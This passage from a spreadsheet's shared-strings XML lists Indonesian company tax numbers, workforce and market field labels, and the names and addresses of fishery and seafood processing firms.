    <t>96.714.752.1-222.000</t>
  </si>
  <si>
    <t>86.888.822.3-403.000</t>
  </si>
  <si>
    <t>96.000.271.5-723.000</t>
  </si>
  <si>
    <t>95.976.227.9-723.000</t>
  </si>
  <si>
    <t>02.069.816.3-511.000</t>
  </si>
  <si>
    <t>81.099.891.4.604.000</t>
  </si>
  <si>
    <t>02.174.668.0.219-000</t>
  </si>
  <si>
    <t>96.174.197.2-809.000</t>
  </si>
  <si>
    <t>80.224.609.0-801.000</t>
  </si>
  <si>
    <t>94.362.811.5-914.000</t>
  </si>
  <si>
    <t>01.070.707.3-057.000</t>
  </si>
  <si>
    <t>03.125.050.9-435.001</t>
  </si>
  <si>
    <t>83.280.855.4-822.000</t>
  </si>
  <si>
    <t>02.853.578.9-804.000</t>
  </si>
  <si>
    <t>01.768.295.6-921.000</t>
  </si>
  <si>
    <t>01.084.163.3-904.000</t>
  </si>
  <si>
    <t>NPWP PERUSAHAAN</t>
  </si>
  <si>
    <t>21.058.887.7-047.000</t>
  </si>
  <si>
    <t>72.999.441.8-112.001</t>
  </si>
  <si>
    <t>73.600.857.4-221.000</t>
  </si>
  <si>
    <t>93.901.390.0.503.000</t>
  </si>
  <si>
    <t>15.016.487.9-221.000</t>
  </si>
  <si>
    <t>95.407.930.7-221.000</t>
  </si>
  <si>
    <t>86.499.155.9-221.000</t>
  </si>
  <si>
    <t>96.836.823.3-047.000</t>
  </si>
  <si>
    <t>06.098.063.8-213.000</t>
  </si>
  <si>
    <t>95.613.488.6-522.000</t>
  </si>
  <si>
    <t>21.123.080.0-432.000</t>
  </si>
  <si>
    <t>15.087.214.1-726.000</t>
  </si>
  <si>
    <t>02.938.499.7-603.000</t>
  </si>
  <si>
    <t>75.642.658.1-941.000</t>
  </si>
  <si>
    <t>71.436.642.4-045.000</t>
  </si>
  <si>
    <t>02.881.392.1-036.000</t>
  </si>
  <si>
    <t>80.180.202.6-801.000</t>
  </si>
  <si>
    <t>15.718.437.5-922.000</t>
  </si>
  <si>
    <t>77.408.622.7-405.000</t>
  </si>
  <si>
    <t>31.486.986.8-619.000</t>
  </si>
  <si>
    <t>08.210.707.9-215.000</t>
  </si>
  <si>
    <t>02.386.136.2-821.000</t>
  </si>
  <si>
    <t>503/071/IUMK/KEC.P/III/2016</t>
  </si>
  <si>
    <t>02.937.969.5-721.000</t>
  </si>
  <si>
    <t>03.218.292.5-801.000</t>
  </si>
  <si>
    <t>01.941.600.7.614.000</t>
  </si>
  <si>
    <t>80.481.519.9-204.000</t>
  </si>
  <si>
    <t>21.020.861.7-008.001</t>
  </si>
  <si>
    <t>41.764.406.9-224.000</t>
  </si>
  <si>
    <t>15.631.355.3-801.000</t>
  </si>
  <si>
    <t>02.046.906.0-903.000</t>
  </si>
  <si>
    <t>41.770.352.7-325.000</t>
  </si>
  <si>
    <t>71.379.931.0-727.000</t>
  </si>
  <si>
    <t>84.491.694.0-941.000</t>
  </si>
  <si>
    <t>02.164.573.4-809.000</t>
  </si>
  <si>
    <t>41.254.698.8-801.000</t>
  </si>
  <si>
    <t>02.383.778.4-801.000</t>
  </si>
  <si>
    <t>90.606.421.7-126.000</t>
  </si>
  <si>
    <t>16.009.202.9-804.000</t>
  </si>
  <si>
    <t>84.333.332.9-215.000</t>
  </si>
  <si>
    <t>Nomor : 0220102202974</t>
  </si>
  <si>
    <t>NPWP Kasih Jaya</t>
  </si>
  <si>
    <t>94.977.532.4-325.001</t>
  </si>
  <si>
    <t>92.229.054.9-617.000</t>
  </si>
  <si>
    <t>41.329.639.3-439.000</t>
  </si>
  <si>
    <t>96.003.643.2-219.000</t>
  </si>
  <si>
    <t>02.831.077.9-041.000</t>
  </si>
  <si>
    <t>86.831.896.5-041.000</t>
  </si>
  <si>
    <t>81.225530.5-224.000</t>
  </si>
  <si>
    <t>41.749.134.7-225.000</t>
  </si>
  <si>
    <t>02.380.501.3-732.002</t>
  </si>
  <si>
    <t>01.071.198.4-057.000</t>
  </si>
  <si>
    <t>96.593.294.0-503.000</t>
  </si>
  <si>
    <t>Ada</t>
  </si>
  <si>
    <t>75.183.767.5-105.000</t>
  </si>
  <si>
    <t>14.922.255.6-224.000</t>
  </si>
  <si>
    <t>01.686.270.8-044.000</t>
  </si>
  <si>
    <t>82.591.197.7-041.000</t>
  </si>
  <si>
    <t>90.411.626.6-617.000</t>
  </si>
  <si>
    <t>42.372.257.8-721.000</t>
  </si>
  <si>
    <t>54.112.564.7-331.000</t>
  </si>
  <si>
    <t>01.517.118.4-801.001</t>
  </si>
  <si>
    <t>96.258.208.6-619.000</t>
  </si>
  <si>
    <t>09.705.477.9-122.000</t>
  </si>
  <si>
    <t>03.137.709.6-922.000</t>
  </si>
  <si>
    <t>016420275-941000</t>
  </si>
  <si>
    <t>72.016.871.5-421.000</t>
  </si>
  <si>
    <t>USAHA IKAN RUSDI</t>
  </si>
  <si>
    <t>41.961.625.5-617.000</t>
  </si>
  <si>
    <t>26.849.405.1-615.000</t>
  </si>
  <si>
    <t>ada</t>
  </si>
  <si>
    <t>41.968.542.5-617.000</t>
  </si>
  <si>
    <t>31.489.833.9-418.000</t>
  </si>
  <si>
    <t>07.651.025.4-033.000</t>
  </si>
  <si>
    <t>93.995.474.9-202.000</t>
  </si>
  <si>
    <t>02.919.715.9-823.000</t>
  </si>
  <si>
    <t>MANSUR USMAN (80.024.878.3-921.000)</t>
  </si>
  <si>
    <t>66.569.558.1-805.000</t>
  </si>
  <si>
    <t>42.301.610.4-642.000</t>
  </si>
  <si>
    <t>41.370.301.8-822.000</t>
  </si>
  <si>
    <t>31.523.522.6-402.000</t>
  </si>
  <si>
    <t>84.955.666.7-801.000</t>
  </si>
  <si>
    <t>01.342.346.2-627.000</t>
  </si>
  <si>
    <t>01.342.405.6-627.000</t>
  </si>
  <si>
    <t>02.268.035.9-723.000</t>
  </si>
  <si>
    <t>value</t>
  </si>
  <si>
    <t>unit</t>
  </si>
  <si>
    <t>tka_administrasi_l</t>
  </si>
  <si>
    <t>tka_administrasi_p</t>
  </si>
  <si>
    <t>tka_pengolahan_l</t>
  </si>
  <si>
    <t>tka_pengolahan_p</t>
  </si>
  <si>
    <t>tkt_administrasi_l</t>
  </si>
  <si>
    <t>tkt_administrasi_p</t>
  </si>
  <si>
    <t>tkt_pengolahan_l</t>
  </si>
  <si>
    <t>tkt_pengolahan_p</t>
  </si>
  <si>
    <t>tkh_administrasi_l</t>
  </si>
  <si>
    <t>tkh_administrasi_p</t>
  </si>
  <si>
    <t>tkh_pengolahan_l</t>
  </si>
  <si>
    <t>tkh_pengolahan_p</t>
  </si>
  <si>
    <t>jumlah_hari_kerja</t>
  </si>
  <si>
    <t>jumlah_shift</t>
  </si>
  <si>
    <t>Row Labels</t>
  </si>
  <si>
    <t>Grand Total</t>
  </si>
  <si>
    <t>Sum of unit</t>
  </si>
  <si>
    <t>tk_tetap_l</t>
  </si>
  <si>
    <t>tk_harian_l</t>
  </si>
  <si>
    <t>tk_harian_p</t>
  </si>
  <si>
    <t>tk_tetap_p</t>
  </si>
  <si>
    <t>Column Labels</t>
  </si>
  <si>
    <t>lenlokal</t>
  </si>
  <si>
    <t>lenekspor</t>
  </si>
  <si>
    <t>pasar_lokal</t>
  </si>
  <si>
    <t>pasar_ekspor</t>
  </si>
  <si>
    <t>06/06/1900  19,06,00</t>
  </si>
  <si>
    <t>25/12/1900  12,01,00</t>
  </si>
  <si>
    <t>385,704,80</t>
  </si>
  <si>
    <t>27/01/1900  20,38,00</t>
  </si>
  <si>
    <t>19/02/1901  03,05,00</t>
  </si>
  <si>
    <t>01/01/1900  07,11,00</t>
  </si>
  <si>
    <t>13/02/1900  01,07,00</t>
  </si>
  <si>
    <t>19/02/1900  05,07,00</t>
  </si>
  <si>
    <t>03/01/1900  17,48,00</t>
  </si>
  <si>
    <t>01/01/1900  18,05,00</t>
  </si>
  <si>
    <t>04/04/1900  15,11,00</t>
  </si>
  <si>
    <t>09/04/1900  17,06,00</t>
  </si>
  <si>
    <t>03/01/1900  14,04,00</t>
  </si>
  <si>
    <t>02/01/1900  10,00,00</t>
  </si>
  <si>
    <t>07/01/1900  07,00,00</t>
  </si>
  <si>
    <t>16/04/1900  23,05,00</t>
  </si>
  <si>
    <t>04/01/1900  13,31,00</t>
  </si>
  <si>
    <t>02/01/1900  07,00,00</t>
  </si>
  <si>
    <t>22,00,00</t>
  </si>
  <si>
    <t>27/01/1900  20,39,00</t>
  </si>
  <si>
    <t>19/02/1901  03,50,00</t>
  </si>
  <si>
    <t>28/01/1900  13,44,00</t>
  </si>
  <si>
    <t>03/01/1900  10,45,00</t>
  </si>
  <si>
    <t>14/03/1900  16,39,00</t>
  </si>
  <si>
    <t>02/01/1900  19,09,00</t>
  </si>
  <si>
    <t>18/07/1900  08,45,00</t>
  </si>
  <si>
    <t>16/01/1900  10,39,00</t>
  </si>
  <si>
    <t>15/01/1900  00,16,00</t>
  </si>
  <si>
    <t>02/01/1900  02,46,00</t>
  </si>
  <si>
    <t>10/01/1900  16,01,00</t>
  </si>
  <si>
    <t>15,20,00</t>
  </si>
  <si>
    <t>01/01/1900  11,36,00</t>
  </si>
  <si>
    <t>01/01/1900  23,06,00</t>
  </si>
  <si>
    <t>04/01/1900  04,37,00</t>
  </si>
  <si>
    <t>17/01/1900  02,09,00</t>
  </si>
  <si>
    <t>165,254,26</t>
  </si>
  <si>
    <t>253,919,76</t>
  </si>
  <si>
    <t>66,209,50</t>
  </si>
  <si>
    <t>14/01/1900  23,42,00</t>
  </si>
  <si>
    <t>2,934,032,42</t>
  </si>
  <si>
    <t>PT, ANUGRAH LAUT INDONESIA</t>
  </si>
  <si>
    <t>Jl, Raya Rembang - Tuban Km 40 RT 008 RW 002, Kel, Bancar, Kec, Bancar, Kabupaten Tuban&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>PT, REPUBLIK LAUTAN JAYA</t>
  </si>
  <si>
    <t>Muara Angke PHPT Pengasinan Blok A No,6 RT 001 RW 006, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>UD, HALIM JAYA</t>
  </si>
  <si>
    <t>Jl, Raya Deli Tua - Patumbak Km 18,5, Jl, Lantasan Baru No,1, Kel, Cinta Damai, Kec, Patumbak, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>PT, GABUNGAN SAMUDERA INTERNASIONAL</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Muara Angke Jl, Pendaratan Ikan No,05 RT 005 RW 003, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>PT, CAHAYA BAHARI JAKARTA</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Muara Angke Jl, Pendaratan Ikan No,04 RT 005 RW 003, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>PT, INDUSTRI PERIKANAN TERPADU CHIU SHIH</t>
  </si>
  <si>
    <t>Jl, Ikan Tuna Barat Raya II, Pelabuhan Benoa, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>PT, INDU MANIS</t>
  </si>
  <si>
    <t>Kawasan Industri Gresik Kav G-1, Kel, Randuagung, Kec, Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>PT, BINTANG JAYAKOTA MANDIRI</t>
  </si>
  <si>
    <t>Jl, Ikan Tuna Raya IV No,16, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>PT, AGROMINA WICAKSANA</t>
  </si>
  <si>
    <t>Jl, Berbek Industri V No,25 B, Kel, Berbek, Kec, Waru, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>UD, BIMA BAHARI MANDIRI</t>
  </si>
  <si>
    <t>Dusun IX, Desa Air Hitam, Kec, Gebang, Kabupaten Langkat&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>PT, MARITIM NUSANTARA PERKASA</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Nizam Zachman Jl, Muara Baru Ujung Blok T No,8 RT 020 RW 017, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>UD, NAGATA TUNA</t>
  </si>
  <si>
    <t>Jl, Cot Aron 2 No,2, Kel, Punge Blang Cut, Kec, Jaya Baru, Kota Banda Aceh&lt;br&gt;Aceh</t>
  </si>
  <si>
    <t>CV, SUMBER LAUT REJEKI</t>
  </si>
  <si>
    <t>Jl, Pelelangan Baru Dermaga 1 No,28-29 Muara Angke, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>PT, BAHARI PRATAMA MANDIRI</t>
  </si>
  <si>
    <t>Jl, Pelita Cipatuguran RT 04 RW 20, Kel, Palabuhanratu, Kec, Palabuhanratu, Kabupaten Sukabumi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>CV, MAROS TIMUR JAYA</t>
  </si>
  <si>
    <t>Jl, Poros Makassar - Maros, Dusun Bulutanae, Kel, Marumpa, Kec, Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>PT, NELAYAN MITRA MANDIRI</t>
  </si>
  <si>
    <t>Komplek PPN Tanjungpandan, Jl, RE Martadinata, Kel, Kota, Kec, Tanjungpandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung</t>
  </si>
  <si>
    <t>PT, SIGER JAYA ABADI</t>
  </si>
  <si>
    <t>Jl, Raya Tanjung Bintang No,99, Kel, Serdang, Kec, Tanjung Bintang, Kabupaten Lampung Selatan&lt;br&gt;Lampung</t>
  </si>
  <si>
    <t>PT, MISAJA MITRA</t>
  </si>
  <si>
    <t>Jl, Raya Pati - Tayu Km 18, Kel, Waturoyo, Kec, Margoyoso, Kabupaten Pati&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>PT, GEMA ISTA RAYA</t>
  </si>
  <si>
    <t>Jl, Tembero No, 17, Kel, Tanggulangin, Kec, Kejayan, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>PT, INDOKOM SAMUDRA PERSADA</t>
  </si>
  <si>
    <t>Jl, Ir, Sutami Km 12,5, Kel, Sukanegara, Kec, Tanjung Bintang, Kabupaten Lampung Selatan&lt;br&gt;Lampung</t>
  </si>
  <si>
    <t>PT, PAHALA BAHARI NUSANTARA</t>
  </si>
  <si>
    <t>Kawasan Industri Karyadeka Pancamurni Kav, B3, Kel, Pasirsari, Kec, Cikarang Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>CV, SINAR TIRTA</t>
  </si>
  <si>
    <t>Jl, Rembang Industri VII/3 Pier Pasuruan, Kel, Pejangkungan, Kec, Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>CV, ANUGERAH BAHARI MANDIRI</t>
  </si>
  <si>
    <t>Jl, Kapasa Raya No,38A, Kel, Kapasa, Kec, Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>PT, TRIDAYA ERAMINA BAHARI</t>
  </si>
  <si>
    <t>Jl, Muara Baru Ujung Blok K No,3, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>PT, INDO AMERICAN SEAFOODS</t>
  </si>
  <si>
    <t>Jl, Ir, Sutami Km 13, Kel, Sukanegara, Kec, Tanjung Bintang, Kabupaten Lampung Selatan&lt;br&gt;Lampung</t>
  </si>
  <si>
    <t>Kampung Bugis, Kel, TPI Kota, Kec, TPI Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>PT, GOLDENSNACK MAS SEJAHTERA</t>
  </si>
  <si>
    <t>Jl, Taman Industri BSB Blok C1 No,9, Kawasan Industri BSB, Kel, Jatibarang, Kec, Mijen, Kota Semarang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Nusantara Brondong, Kawasan PPDI RT 01 RW 05 Jompong, Kel, Brondong, Kec, Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>PT, HENTRY JAYA</t>
  </si>
  <si>
    <t>Jl, Ikan Tuna Raya No,17 Pelabuhan Benoa, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>PT, SIGER JAYA SENTOSA</t>
  </si>
  <si>
    <t>Jl, Raya Tanjung Bintang No,101, Kel, Serdang, Kec, Tanjung Bintang, Kabupaten Lampung Selatan&lt;br&gt;Lampung</t>
  </si>
  <si>
    <t>PT, PRIMO INDO IKAN</t>
  </si>
  <si>
    <t>Jl, Ikan Tuna I No,1 Pelabuhan Benoa, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>PT, SAMUDRA SEAFOOD PRODUCTS</t>
  </si>
  <si>
    <t>Jl, Gatot Subroto No,4, Kel, Bulusan, Kec, Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>UD, BARAKAH</t>
  </si>
  <si>
    <t>Kampung Nelayan Olio RT 16 RW 06, Kel, Merdeka, Kec, Kupang Timur, Kabupaten Kupang&lt;br&gt;Nusa Tenggara Timur</t>
  </si>
  <si>
    <t>PT, MEDAN TROPICAL CANNING &amp; FROZEN INDUSTRIES</t>
  </si>
  <si>
    <t>Jl, K, L, Yos Sudarso KM 10,5 Kawasan Industri Medan, Kel, Mabar, Kec, Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Jl, Baran Satu Meral RT 002 RW 003, Kel, Baran, Kec, Meral, Kabupaten Karimun&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>CV, BAHAGIA</t>
  </si>
  <si>
    <t>Jl, Gabion No,999 Pelabuhan Perikanan Samudera Belawan, Kel, Bagan Deli, Kec, Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>PT, SUMBER PANGAN NUSANTARA</t>
  </si>
  <si>
    <t>Jl, Raya Buduran No,555, Kel, Buduran, Kec, Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>PT, AGUNG JAYASARI SAKTI</t>
  </si>
  <si>
    <t>Jl, Raya Palembang - Prabumulih Km 29, Kel, Palem Raya, Kec, Indralaya Utara, Kabupaten Ogan Ilir&lt;br&gt;Sumatera Selatan</t>
  </si>
  <si>
    <t>PT, INSAN CITRAPRIMA SEJAHTERA</t>
  </si>
  <si>
    <t>Jl, Raya Jenu - Merak Urak No,148 C, Desa Sekardadi, Kec, Jenu, Kabupaten Tuban&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>PT, YIN JING INTERNASIONAL</t>
  </si>
  <si>
    <t>Jl, Kima 3 Kav S-13, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>PT, HASIL INDO SEJAHTERA</t>
  </si>
  <si>
    <t>Jl, Ir, Sutami, Kompleks Pergudangan Karunia Sulawesi Blok G8, Kel, Parangloe, Kec, Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>PT, FUDA SARI LAUT</t>
  </si>
  <si>
    <t>Jl, M, Yakub Lubis No,99/I Dusun III, Kel, Bandar Khalifah, Kec, Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>PT, ALGAE SUMBA TIMUR LESTARI</t>
  </si>
  <si>
    <t>Desa Tanamanang, Kec, Pahunga Lodu, Kabupaten Sumba Timur&lt;br&gt;Nusa Tenggara Timur</t>
  </si>
  <si>
    <t>PT, BIOTA LAUT GANGGANG</t>
  </si>
  <si>
    <t>Jl, Kebangkitan No,8, Dusun Belabelawa, Kel, Polewali, Kec, Suppa, Kabupaten Pinrang&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>PT, PEDULI LAUT MALUKU</t>
  </si>
  <si>
    <t>Jl, Raya Tulehu, Dusun Mamokeng, Desa Tulehu, Kec, Salahutu, Kabupaten Maluku Tengah&lt;br&gt;Maluku</t>
  </si>
  <si>
    <t>CV, BEE JAY SEAFOODS</t>
  </si>
  <si>
    <t>Jl, Tanjung Tembaga Barat Pelabuhan Mayangan, Kel, Mayangan, Kec, Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>PT, CITRA DIMENSI ARTHALI</t>
  </si>
  <si>
    <t>Perum Prasarana Perikanan Samudera Blok N No,11, Jl, Muara Baru Ujung, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>CV, FIRDALI SEJAHTERA</t>
  </si>
  <si>
    <t>Jl, Husein Sastranegara No,109 RT 003 RW 010 Room 07, Kel, Benda, Kec, Benda, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>PT, WEST IRIAN FISHING INDUSTRIES</t>
  </si>
  <si>
    <t>Jl, Udang No,6 Klademak I, Kel, Klaligi, Kec, Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat</t>
  </si>
  <si>
    <t>PT, MASUYA GRAHA TRIKENCANA</t>
  </si>
  <si>
    <t>Jl, Cempaka No,12 Blok F-I, Kel, Jatimulya, Kec, Tambun Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>PT, SAMUDERA PANGAN INDONESIA</t>
  </si>
  <si>
    <t>Jl, Tuna Raya No,5, Muara Baru Ujung, PPS Nizam Zachman, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Jl, Tuna Raya No, 5, Muara Baru Ujung, PPS Nizam Zachman, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>PT, CILACAP SAMUDERA FISHING INDUSTRY</t>
  </si>
  <si>
    <t>Kompleks PPS Kendari, Jl, Samudera No,1, Kel, Puday, Kec, Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara</t>
  </si>
  <si>
    <t>Jl, Ir, Sutami Km,13, Kel, Sukanegara, Kec, Tanjung Bintang, Kabupaten Lampung Selatan&lt;br&gt;Lampung</t>
  </si>
  <si>
    <t>Wonsobo I RT 03 RW 01, Kel, Banjarejo, Kec, Tanjungsari, Kabupaten Gunung Kidul&lt;br&gt;Daerah Istimewa Yogyakarta</t>
  </si>
  <si>
    <t>CV, MAJU MAKMUR SAMUDRA</t>
  </si>
  <si>
    <t>Pasar Ikan Blok I No,65-68 Pelabuhan Perikanan Muara Angke, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>PT, BUDI SENTOSA ABADI</t>
  </si>
  <si>
    <t>Jl, Samuel Languyu No,10, Kel, Aertembaga I Lingkungan II, Kec, Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>UD, UTAMA SENTOSA TIMIKA</t>
  </si>
  <si>
    <t>Jl, Yos Sudarso KM 7, Kel, Kamoro Jaya, Kec, Timika Timur, Kabupaten Mimika&lt;br&gt;Papua</t>
  </si>
  <si>
    <t>CV, ANGIN TIMUR SEAFOODS</t>
  </si>
  <si>
    <t>Pergudangan Sinar Gedangan Blok E-15, Kel, Gemurung, Kec, Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>PT, NUGRAHA ALAM TUNAS NUSANTARA</t>
  </si>
  <si>
    <t>Batu Kapal RT 002 RW 004, Kel, Ranai, Kec, Bungaran Timur, Kabupaten Natuna&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>PT, WAHYU PUTRA BIMASAKTI</t>
  </si>
  <si>
    <t>Jl, Kima 10 Blok T No,2B, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>CV, PUTRA TELLO MANDIRI</t>
  </si>
  <si>
    <t>Jl, Pukat Banting II No,54, Kel, Bantan, Kec, Medan Tembung, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>PT, BARAMUDA BAHARI</t>
  </si>
  <si>
    <t>Desa Wonokoyo, Kec, Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>UD, PIALA I</t>
  </si>
  <si>
    <t>Jl, Cakalang, Kompleks Pelabuhan Perikanan Pantai Sorong, Kel, Kampung Baru, Kec, Sorong Kota, Kota Sorong&lt;br&gt;Papua Barat</t>
  </si>
  <si>
    <t>UD, MENARA MAS</t>
  </si>
  <si>
    <t>Jl, Sukamara No,48 RT 01 RW 02 , Kel, Landasan Ulin Utara, Kec, Liang Anggang, Kota Banjar Baru&lt;br&gt;Kalimantan Selatan</t>
  </si>
  <si>
    <t>PT, INDAH JAYA BAHARI</t>
  </si>
  <si>
    <t>Jl, Samudera No,1 Blok B Pelabuhan Perikanan Samudera Kendari, Kel, Puday, Kec, Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara</t>
  </si>
  <si>
    <t>PT, LAUTAN DELI JAYA</t>
  </si>
  <si>
    <t>Jl, Raya Perancis Gudang 9 Blok BG-BH , Kel, Dadap, Kec, Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>PT, WAHYU PRADANA BINAMULIA</t>
  </si>
  <si>
    <t>Jl, Kima 10 Blok T No, 2B, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>PT, PAHALA SAMUDERA FISHERY INDUSTRIES</t>
  </si>
  <si>
    <t>Jl, Gajah Mada No,3-5 RT 001 RW 008 Komplek Duta Merlin Blok B 31-32, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>PT, AGUNG MANDIRI LESTARI</t>
  </si>
  <si>
    <t>Jl, Raya Narogong KM 77, Kel, Cikiwul, Kec, Bantar Gebang, Kota Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>PT, LONTARA JAYA SAKTI</t>
  </si>
  <si>
    <t>Jl, Pasar Ikan Beba, Kel, Tamasaju, Kec, Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>CV, CHARLIE ERA PRANATA</t>
  </si>
  <si>
    <t>Jl, Alor Komplek PPI Oeba, Kel, Fatubesi, Kec, Kota Lama, Kota Kupang&lt;br&gt;Nusa Tenggara Timur</t>
  </si>
  <si>
    <t>Jl, Agung Karya IV Blok B No,22, Kel, Papanggo, Kec, Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>PT, CENTRALPERTIWI BAHARI PLANT II</t>
  </si>
  <si>
    <t>Kampung Mandiri, Kec, Dente Teladas, Kabupaten Tulangbawang&lt;br&gt;Lampung</t>
  </si>
  <si>
    <t>PT, SINAR BAHARI LAUTAN TIMUR INDONESIA</t>
  </si>
  <si>
    <t>Kota Bitung, Kel, Manembo Nembo, Kec, Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>PT, UNIMITRA ANDALAN SEJATI</t>
  </si>
  <si>
    <t>Jl, Tekno I Kawasan Industri Jababeka 3C No,3B, Kel, Pasir Gombong, Kec, Cikarang Utara, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>CV, BUMI INDO</t>
  </si>
  <si>
    <t>Jl, Tirta Suam No,1, Kel, Kedundung, Kec, Magersari, Kota Mojokerto&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>PT, IROHA SIDAT INDONESIA</t>
  </si>
  <si>
    <t>Jl, Gatot Subroto No,46, Kel, Bulusan, Kec, Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Muara Angke PHPT Pengasinan Blok A No,6 RT 006 RW 001, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Jl, Tuna Kompleks Pelabuhan Perikanan Samudera (PPS) Kendari, Kel, Puday, Kec, Poasia, Kota Kendari&lt;br&gt;Sulawesi Tenggara</t>
  </si>
  <si>
    <t>PT, ANEKA SUMBER TATA BAHARI</t>
  </si>
  <si>
    <t>Jl, Hurnala II, Kel, Tulehu, Kec, Salahutu, Kabupaten Maluku Tengah&lt;br&gt;Maluku</t>
  </si>
  <si>
    <t>PT, MUSTIKA MINANUSA AURORA</t>
  </si>
  <si>
    <t>Jl, Buntu Komplek Pelabuhan Perikanan Pantai Tarakan, Kel, Karang Anyar Pantai, Kec, Tarakan Barat, Kota Tarakan&lt;br&gt;Kalimantan Utara</t>
